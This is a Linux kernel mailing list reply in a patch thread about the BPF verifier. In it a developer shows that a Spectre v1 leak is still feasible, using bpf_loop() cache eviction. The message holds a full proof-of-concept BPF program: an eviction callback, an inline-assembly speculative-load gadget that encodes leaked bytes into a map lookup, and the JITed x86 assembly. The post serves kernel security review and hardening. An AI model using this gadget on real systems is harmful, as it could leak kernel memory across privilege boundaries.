[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20230918112549.105846-1-gerhorst@amazon.de>
Date: Mon, 18 Sep 2023 11:25:50 +0000
From: Luis Gerhorst <gerhorst@...zon.de>
To: <alexei.starovoitov@...il.com>
CC: <andrii@...nel.org>, <ast@...nel.org>, <bpf@...r.kernel.org>,
<daniel@...earbox.net>, <gerhorst@...zon.de>, <gerhorst@...fau.de>,
<hagarhem@...zon.de>, <haoluo@...gle.com>, <iii@...ux.ibm.com>,
<john.fastabend@...il.com>, <jolsa@...nel.org>,
<kpsingh@...nel.org>, <laoar.shao@...il.com>,
<linux-kernel@...r.kernel.org>, <linux-kselftest@...r.kernel.org>,
<martin.lau@...ux.dev>, <mykolal@...com>, <puranjay12@...il.com>,
<sdf@...gle.com>, <shuah@...nel.org>, <song@...nel.org>,
<yonghong.song@...ux.dev>
Subject: Re: [PATCH 2/3] Revert "bpf: Fix issue in verifying allow_ptr_leaks"
On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
> You mean since skb_shared_info is placed after skb->end
> and in zero copy case destructor_arg may be initialized with the same
> kernel pointer for multiple skb-s ?
> The attacker cannot construct the address from data_end.
> The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END.
> But the attacker can do skb->data + X.
> The idea is that they can train the branch to mispredict with
> a large packet and then send a small one so that shared_info
> after skb->end has the same uarg pointer in all packets?
> So every skb->data+X is a different location, but all of them
> point to data that has uarg==destructor_arg ?
>
> That would be feasible in theory, but in order to speculate the loads
> the branch mispredict has to be reliable.
> The spec v1 attack requires one of two loads feeding
> into compare operation has to be slow.
> In this case both data and data_end loads are going to be fast.
> The attacker cannot evict skb->data or skb->data_end from cache.
It is true that this is not easily possible using the method most exploits use,
at least to my knowledge (i.e., accessing the same address from another core).
However, it is still possible to evict the cacheline with skb->data/data_end
from the cache in between the loads by iterating over a large map using
bpf_loop(). Then the load of skb->data_end would be slow while skb->data is
readily available in a callee-saved register.
For a CPU with 64KiB of per-core L1 cache, all 64-byte cachelines can be evicted
by iterating over a 64KiB array using 64-byte increments; that's only 1k
iterations. Meanwhile, skb->data can be kept safe in r15 as this is not used by
bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might be
possible as bpf_loop() currently has an iteration limit of 8 million. To extend
that, userspace could work on evicting the L3 cache from other cores and make
the speculation window even larger. This would of course slow the whole reading
process down, but in return you can also leak more data by indexing into the
leak-array using a full byte.
For reference, here's the full program and the assembly it is JITed to:
// bpf_loop() callback: looks up evictmap at key (index * 8) and, if the
// element exists, doubles the stored value in place so the element is both
// read and written.
//
// index: iteration number handed in by bpf_loop().
// ctx:   callback context pointer; not used here.
//
// Returns 0 when the element was found and updated, 1 when the lookup
// returned NULL.
static long callback_fn(__u32 index, void *ctx)
{
	__u32 slot = index * 8;
	__u64 *entry = bpf_map_lookup_elem(&evictmap, &slot);

	// Key is outside the map: report 1 instead of touching memory.
	if (!entry)
		return 1;

	*entry *= 2;
	return 0;
}
// Proof-of-concept tcx/ingress program written entirely in BPF assembly.
//
// Phases (named after the labels in the asm body):
//   prepare_data: save the ctx pointer (r1) in r7, load the ctx field at +76
//                 (data) into r8 and keep data + 34 in r9 for the later
//                 bounds check.
//   evict_loop:   call bpf_loop() with w1 = 1024 iterations of callback_fn,
//                 passing a pointer to a zeroed 8-byte stack slot (r10 - 8)
//                 as callback context and 0 in r4.
//   gadget:       reload the ctx field at +80 (data_end) into r2, compare it
//                 against r9 and, on the fall-through path, load one byte,
//                 spill it to the stack slot and use that slot as the key
//                 for a leakmap lookup.
//
// Returns r6: 0 if the bounds check branches to exit or the leakmap lookup
// returns NULL, otherwise the u64 stored at offset 0 of the looked-up value.
//
// NOTE(review): the gadget's byte load is *(u8 *)(r7 + 14), i.e. relative to
// the saved ctx pointer in r7, not relative to the packet pointer held in
// r8 -- confirm which base register was intended.
SEC("tcx/ingress")
__naked void pkt_ptr(void)
{
// Offsets of the fields read from the context pointer (r1, saved in r7):
// +76: data
// +80: data_end
asm volatile (" \
r6 = 0; \
r7 = r1; \
prepare_data_%=: \
r8 = *(u32 *)(r1 + 76); \
r9 = r8; \
r9 += 34; \
evict_loop_%=: \
w1 = 1024; \
r2 = %[callback_fn] ll; \
r3 = 0; \
*(u64 *)(r10 - 8) = r3; \
r3 = r10; \
r3 += -8; \
r4 = 0; \
call %[bpf_loop]; \
gadget_%=: \
r2 = *(u32 *)(r7 + 80); \
if r2 <= r9 goto exit_%=; \
r5 = *(u8 *)(r7 + 14); \
*(u64*)(r10 - 8) = r5; \
r2 = r10; \
r2 += -8; \
r1 = %[leakmap] ll; \
call %[bpf_map_lookup_elem]; \
if r0 == 0 goto exit_%=; \
r6 = *(u64 *)(r0 + 0); \
exit_%=: r0 = r6; \
exit; \
" :
: __imm_addr(leakmap),
__imm_addr(callback_fn),
__imm(bpf_loop),
__imm(bpf_map_lookup_elem)
: __clobber_all);
}
bpf_prog_64fe264baec539aa_pkt_ptr:
; asm volatile (" \
0: endbr64
4: nopl 0x0(%rax,%rax,1)
9: xchg %ax,%ax
b: push %rbp
c: mov %rsp,%rbp
f: endbr64
13: sub $0x20,%rsp
1a: push %rbx
1b: push %r13
1d: push %r14
1f: push %r15
21: xor %ebx,%ebx
23: mov %rdi,%r13
26: mov 0xc8(%rdi),%r14
2d: mov %r14,%r15
30: add $0x22,%r15 // data prepared
34: mov $0x2000,%edi
39: movabs $0xffffffffc01d09b0,%rsi
43: xor %edx,%edx
45: mov %rdx,-0x8(%rbp)
49: lfence
4c: mov %rbp,%rdx
4f: add $0xfffffffffffffff8,%rdx
53: xor %ecx,%ecx
55: cmp $0x800000,%rdi
5c: jbe 0x0000000000000065
5e: mov $0xfffffff9,%eax
63: jmp 0x00000000000000a2
65: mov %rbx,-0x20(%rbp)
69: mov %r13,-0x18(%rbp)
6d: mov %r14,-0x10(%rbp)
71: mov %rdi,%rbx
74: xor %r13d,%r13d
77: mov %rdx,%r14
7a: cmp %rbx,%r13
7d: jae 0x0000000000000093
7f: mov %r13,%rdi
82: mov %r14,%rsi
85: callq 0x0000000000000148
8a: add $0x1,%r13
8e: test %rax,%rax
91: je 0x000000000000007a
93: mov %r13,%rax
96: mov -0x20(%rbp),%rbx
9a: mov -0x18(%rbp),%r13
9e: mov -0x10(%rbp),%r14
a2: mov 0x50(%r13),%rsi // load data_end
a6: cmp %r15,%rsi // use of data_end and data
a9: jbe 0x00000000000000f7 // to mispredict
ab: movzwq 0x7c(%r13),%r8 // use of data
b0: shr $0x10,%r8d
b4: and $0xff,%r8d
bb: mov %r8,-0x8(%rbp)
bf: mov %rbp,%rsi
c2: add $0xfffffffffffffff8,%rsi
c6: movabs $0xffffb85680acd000,%rdi
d0: add $0x210,%rdi
d7: mov 0x0(%rsi),%eax
da: cmp $0x20000,%rax
e1: jae 0x00000000000000ec
e3: shl $0x3,%rax
e7: add %rdi,%rax
ea: jmp 0x00000000000000ee
ec: xor %eax,%eax
ee: test %rax,%rax
f1: je 0x00000000000000f7
f3: mov 0x0(%rax),%rbx
f7: mov %rbx,%rax
fa: pop %r15
fc: pop %r14
fe: pop %r13
100: pop %rbx
101: leaveq
102: retq
long callback_fn(__u32 index, void * ctx):
bpf_prog_8e1ec5bf965fdd4a_callback_fn:
; __u32 key = index * 8;
0: endbr64
4: nopl 0x0(%rax,%rax,1)
9: xchg %ax,%ax
b: push %rbp
c: mov %rsp,%rbp
f: endbr64
13: sub $0x8,%rsp
1a: shl $0x3,%edi
; __u32 key = index * 8;
1d: mov %edi,-0x4(%rbp)
20: lfence
23: mov %rbp,%rsi
;
26: add $0xfffffffffffffffc,%rsi
; __u64 *value = bpf_map_lookup_elem(&evictmap, &key);
2a: movabs $0xffffb85680a01000,%rdi
34: add $0x210,%rdi
3b: mov 0x0(%rsi),%eax
3e: cmp $0x1000,%rax
45: jae 0x0000000000000050
47: shl $0x3,%rax
4b: add %rdi,%rax
4e: jmp 0x0000000000000052
50: xor %eax,%eax
52: mov $0x1,%edi
; if (value) {
57: test %rax,%rax
5a: je 0x0000000000000069
; *value = 2 * *value;
5c: mov 0x0(%rax),%rdi
; *value = 2 * *value;
60: shl %rdi
; *value = 2 * *value;
63: mov %rdi,0x0(%rax)
67: xor %edi,%edi
; }
69: mov %rdi,%rax
6c: leaveq
6d: retq
> Remember that we rearranged 'max_entries' field in struct bpf_map
> specifically to be in the different cache line vs fields
> controlled by user space. It was the necessary part of spec v1 attack.
--
Luis
Amazon Development Center Germany GmbH
Krausenstr. 38
10117 Berlin
Geschaeftsfuehrung: Christian Schlaeger, Jonathan Weiss
Eingetragen am Amtsgericht Charlottenburg unter HRB 149173 B
Sitz: Berlin
Ust-ID: DE 289 237 879
Powered by blists - more mailing lists